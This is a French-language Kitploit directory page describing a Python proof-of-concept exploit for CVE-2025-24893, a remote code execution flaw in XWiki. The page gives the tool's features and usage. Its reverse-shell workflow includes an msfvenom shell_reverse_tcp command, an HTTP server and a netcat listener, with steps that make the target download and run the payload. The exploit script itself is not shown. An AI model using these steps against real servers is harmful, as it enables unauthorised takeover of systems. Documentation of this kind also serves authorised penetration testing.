Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-24893 — PoC exploits CVE-2025-24893 , a remote code execution (RCE) vulnerability in XWiki caused by improper sandboxing in Groovy macros rendered asynchronously. It allows arbitrary command execution through injection into RSS-based SolrSearch endpoints. | Kitploit
Outils/GitHubGitHub/infinit3i/cve-2025-24893
Payload GenerationVulnerability AnalysisExploitationShellcodeWeb Application ExploitationCommand and Control
GitHubinfinit3i/cve-2025-24893

CVE-2025-24893

PoC exploits CVE-2025-24893 , a remote code execution (RCE) vulnerability in XWiki caused by improper sandboxing in Groovy macros rendered asynchronously. It allows arbitrary command execution through injection into RSS-based SolrSearch endpoints.

Voir le dépôt
61il y a 11 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

Preuve de concept XWiki CVE-2025-24893

Auteurs : Net.Doge & Infinit3i


Image CVE-2025-24893



Twitter Follow


Ce script Python exploite CVE-2025-24893, une vulnérabilité d'exécution de code à distance (RCE) dans XWiki causée par un sandboxing inadéquat dans les macros Groovy exécutées de manière asynchrone. Il permet l'exécution de commandes arbitraires via une injection dans les endpoints RSS basés sur SolrSearch.

📌 Fonctionnalités

  • Exécution d'une commande unique via injection Groovy
  • Génération automatique d'un reverse shell (avec msfvenom)
  • Possibilité de personnaliser :
    • Cible distante
    • Adresse IP locale
    • Port du serveur HTTP
    • Port du reverse shell
  • Aperçu propre des payloads bash
  • Interface TUI interactive avec couleurs ANSI

🚀 Utilisation

  1. Clonez ou téléchargez le script.

  2. Assurez-vous d'avoir les éléments suivants installés :

    • msfvenom de Metasploit
    • Python 3
    • jq (utilisé dans les payloads bash)
  3. Exécutez le script :

root@kitploit:~
python3 CVE-2025-24893-PoC.py
  1. Choisissez dans le menu :

    • Run Command – Exécutez une commande shell à distance.
    • Reverse Shell – Générez et déployez un reverse shell ELF sur la cible.
    • Change Settings – Modifiez LHOST, RHOST, le port du serveur ou le port du beacon.

🧪 Workflow du reverse shell

  1. Le payload est généré :
root@kitploit:~
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<votre_ip> LPORT=<port_beacon> -f elf -o rev
  1. Il vous est demandé de démarrer un serveur HTTP Python et un listener netcat :
root@kitploit:~
python3 -m http.server 8080
nc -lvnp 31337
  1. Le script envoie la séquence suivante à la cible :

    • Téléchargement du payload
    • Rendre exécutable
    • Exécution du binaire

⚠️ Avertissement

Cet outil est destiné uniquement à des fins éducatives et de tests autorisés. Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite est illégale et contraire à l'éthique.

📄 Référence

  • XWiki
  • MITRE CVE-2025-24893
Télécharger l’outil